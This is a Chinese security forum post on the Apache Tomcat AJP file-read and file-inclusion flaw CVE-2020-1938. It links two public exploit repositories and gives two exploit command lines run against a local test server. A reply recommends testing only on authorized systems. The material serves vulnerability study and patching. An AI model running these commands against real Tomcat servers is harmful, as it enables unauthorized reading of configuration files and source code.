查看: 25748|回复: 1

Apache-Tomcat-Ajp漏洞(CVE-2020-1938)

[复制链接]
发表于 2020-2-21 10:31:48 | 显示全部楼层 |阅读模式
本帖最后由 90_ 于 2020-2-21 10:52 编辑

    Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。此漏洞为文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。


CNVD-2020-10487
CVE-2020-1938

EXP-1

https://github.com/0nise/CVE-2020-1938

apache-tomcat-8.5.32.zip 测试tomcat

任意文件读取
[AppleScript] 查看源码 复制代码
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp


文件包含
[AppleScript] 查看源码 复制代码
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp


打包方式:在目录tomcat/ajp-bug 执行 mvn clean compile assembly:assembly

EXP-2

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

20200220231832.png
回复

使用道具 举报

发表于 5 天前 | 显示全部楼层

Re: Apache-Tomcat-Ajp漏洞(CVE-2020-1938)

感谢分享!这个漏洞当时影响挺广的,很多没开AJP连接器的Tomcat其实不受影响,但默认配置下AJP是开启的,所以大家还是要尽快升级或修改配置。你提供的EXP链接很有参考价值,测试命令也很清晰。不过在测试时记得只在授权环境下进行,避免误伤线上服务。顺便问一下,除了打补丁,你推荐直接禁用AJP端口吗?
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-5-24 02:32 , Processed in 0.041807 second(s), 22 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部